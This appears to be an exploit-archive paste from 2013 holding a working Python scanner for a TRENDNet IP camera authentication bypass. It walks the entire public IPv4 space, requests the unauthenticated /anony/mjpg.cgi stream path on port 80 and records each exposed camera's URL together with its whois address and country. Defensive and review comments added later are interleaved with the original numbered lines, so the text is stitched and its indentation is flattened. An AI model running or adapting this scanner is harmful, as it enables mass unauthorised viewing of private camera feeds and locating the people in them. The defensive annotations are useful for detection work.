Mayk0

#; TRENDNet IP Cam Authentication Bypass Vulnerability

Apr 11th, 2013
  1. Full title: TRENDNet IP Cam Authentication Bypass Vulnerability
  2. Date add: 2013-04-12
  3. Category: remote exploits
  4. Verified: Verified
  5. Platform: hardware
  6. --------------------------------------------------------------------
  7.  
  8. # Exploit Title: TRENDNet IP Cam Magic URL Searcher.
  9. # Date: [10/04/2013]
  10. # Author: [SnakingMax]
  11. # Website: http://snakingmax.blogspot.com/
  12. # Category: [Remote Exploit]
  13.  
  14.  
  15. # Vulnerability description:
  16. # Bypass the TRENDNet IP Cam authentication protection by using a magic URL ^.^ (the code below requests /anony/mjpg.cgi with no credentials)
  17. #
  18. # Software Description:
  19. # This software scans the Internet to find vulnerable TRENDNet IP cams.
  20.  
  21. from struct import *
  22. from socket import *
  23. from http.client import HTTPConnection
  24. import urllib.request
  25. import subprocess
  26.  
  27.  
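  def isPublicIP(ip):
      """Return True when *ip* is a globally routable IPv4 unicast address.

      The address is parsed strictly with ``inet_pton(AF_INET, ...)`` and
      compared against a table of special-purpose networks. The original
      table listed only loopback and the three RFC 1918 private ranges, so
      link-local, carrier-grade NAT, multicast, reserved and "this network"
      addresses were reported as public; those ranges are now included.

      Args:
          ip: Dotted-quad IPv4 address string.

      Returns:
          False if the address falls inside any special-purpose network
          listed below, True otherwise.

      Raises:
          OSError: if *ip* is not a valid dotted-quad IPv4 string
              (raised by ``inet_pton``).
      """
      # (network, netmask) pairs that are not publicly routable unicast space.
      non_public = (
          ("0.0.0.0", "255.0.0.0"),        # "this network"
          ("10.0.0.0", "255.0.0.0"),       # RFC 1918 private
          ("100.64.0.0", "255.192.0.0"),   # carrier-grade NAT shared space
          ("127.0.0.0", "255.0.0.0"),      # loopback
          ("169.254.0.0", "255.255.0.0"),  # link-local
          ("172.16.0.0", "255.240.0.0"),   # RFC 1918 private
          ("192.168.0.0", "255.255.0.0"),  # RFC 1918 private
          ("224.0.0.0", "240.0.0.0"),      # multicast
          ("240.0.0.0", "240.0.0.0"),      # reserved, incl. limited broadcast
      )

      # Work on the 32-bit integer form so a mask test is a single AND.
      addr = unpack('!I', inet_pton(AF_INET, ip))[0]
      for network, netmask in non_public:
          mask = unpack('!I', inet_aton(netmask))[0]
          if (addr & mask) == unpack('!I', inet_aton(network))[0]:
              return False
      return True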
  39.  
  40.  
  41. def isPublicWebcam(ip):
  42. #Returns True when ip answers an HTTP GET for /anony/mjpg.cgi on port 80 with the exact content-type compared below; returns False otherwise, including on any exception.
      # Defender note: the request carries no credentials, so a True result means the
      # stream path is being served without authentication.
      # Detection: the fixed request path "/anony/mjpg.cgi" is the indicator to look for
      # in camera, reverse-proxy and IDS logs.
      # Mitigation (general): run the vendor's fixed firmware and keep the camera's HTTP
      # port off the public Internet (firewall/VPN) - TODO confirm fixed version per model.
  43. try:
      # 5-second timeout bounds the connection attempt and the read of the response.
  44. conn = HTTPConnection(ip, 80, timeout=5)
  45. conn.request('GET', "/anony/mjpg.cgi")
  46. response = conn.getresponse()
      # multipart/x-mixed-replace is the MIME type used for MJPEG-over-HTTP streams;
      # the comparison is an exact string match, boundary value included.
  47. if (response.info()["content-type"] == 'multipart/x-mixed-replace;boundary=myboundary'):
  48. response.close()
  49. conn.close()
  50. return True
  51. response.close()
  52. conn.close()
  53. return False
      # Any failure (refused connection, timeout, missing header, ...) is reported as False.
  54. except Exception as E:
  55. return False
      # NOTE(review): indentation was lost in the paste, but as listed the two close()
      # calls below come after a return on every path and appear unreachable.
  56. response.close()
  57. conn.close()
  58.  
  59.  
  60. def addThisCamToMyList(camIP):
  61. #Appends one record for camIP to CamList.txt in the current working directory: the stream URL plus fields pulled from whois output.
      # Forensic note: a CamList.txt file carrying the banner lines written below is an
      # on-disk artifact of this tool having run on a host.
  62. camlist = open("CamList.txt", "at")
  63. camlist.write("------------------------WEBCAM------------------------\n")
  64.  
  65. #Write the stream URL for this address.
  66. camlist.write(" URL: http://"+camIP+"/anony/mjpg.cgi\n")
  67.  
  68. #Run the external whois command on the IP (argument list, no shell) and split its output into lines.
      # check_output returns bytes; str() of bytes gives the "b'...'" repr, in which line
      # breaks appear as the two characters backslash + n - hence the split on "\\n".
  69. whoisInfo = subprocess.check_output(["whois", camIP])
  70. whoisList = str(whoisInfo).split("\\n")
  71. #Write each whois line containing "address", minus its first 8 characters.
  72. for i in whoisList:
  73. if (i.count("address")>0):
  74. camlist.write(" ADDRESS:\n")
  75. camlist.write(i[8:]+"\n")
  76. #Handle the whois line containing "country".
      # NOTE(review): as listed, this writes only the COUNTRY header to the file and prints
      # the first 8 characters of the line to stdout; the nesting of break cannot be
      # recovered from the flattened paste.
  77. for i in whoisList:
  78. if (i.count("country")>0):
  79. camlist.write(" COUNTRY:\n")
  80. print(i[:8]+"\n")
  81. break
  82. camlist.write("------------------------------------------------------\n")
      # The file is closed only on the normal path; an exception above leaves it open.
  83. camlist.close()
  84.  
  85.  
  86.  
  87. if ( (__name__)=="__main__" ):
  88. #Enumerates a.b.c.d with a, b and c counting down from 255 to 0 and d running from 1 to 254, one address at a time.
      # Detection note: every address that passes isPublicIP receives one HTTP request, so
      # on a network sensor this appears as a single source opening port-80 connections
      # to consecutive addresses, each asking for the same path.
  89. for a in reversed(range(256)):
  90. for b in reversed(range(256)):
  91. for c in reversed(range(256)):
  92. for d in range(1,255):
  93. generatedIP = str(a)+"."+str(b)+"."+str(c)+"."+str(d)
  94. #Skip addresses that isPublicIP classifies as non-public.
  95. if(isPublicIP(generatedIP)):
  96. print("Testing IP: "+generatedIP)
  97. #Probe the address with isPublicWebcam.
  98. if (isPublicWebcam(generatedIP)):
  99. print(generatedIP + " is a webcam ;-)")
  100. #Append a record for the responding address to CamList.txt.
  101. addThisCamToMyList(generatedIP)